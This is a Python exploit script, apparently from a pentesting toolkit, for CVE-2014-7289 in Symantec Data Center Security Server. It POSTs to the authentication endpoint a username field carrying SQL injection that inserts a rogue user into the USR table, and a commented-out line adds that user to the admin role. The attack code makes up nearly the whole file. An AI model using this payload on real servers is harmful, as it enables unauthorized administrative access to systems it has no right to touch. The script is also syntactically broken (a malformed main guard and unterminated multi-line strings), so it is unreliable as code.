sec-pentesting-toolkit/Web_Hacking/SQLi/CVE-2014-7289_exploit.py

#!/usr/bin/env python
# Reference: http://seclists.org/fulldisclosure/2015/Jan/91


import httplib
def send_request(host,data):
        params = data
        headers = {"AppFire-Format-Version": "1.0",
                   "AppFire-Charset": "UTF-16LE",
                   "Content-Type":"application/x-appfire",
                   "User-Agent":"Java/1.7.0_45",
                   }
        conn = httplib.HTTPSConnection(host)
        conn.request("POST", "/sis-ui/authenticate", params, headers)
        response = conn.getresponse()
        data=response.read()
        conn.close()    
        return response,data

if __name__ = '__main__'
        header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
        data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
        PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
        PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
        VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
        '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
        07:13:23', '1', '0', '0',
        'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
        -- '' " # add user to USR table
        #data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
        ROLERID) VALUES (1504, 1); -- " # add user to admin group
        data+="\r\nan=Symantec Data Center Security Server
        6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
        data = data.encode('utf-16le')
        
        eof_flag="\nEOF_FLAG\n"
        header = header %(len(data))
        payload=header+data+eof_flag
        
        response,data = send_request("<host>:4443",payload)
        
        print data.decode('utf-16le')
        print response.status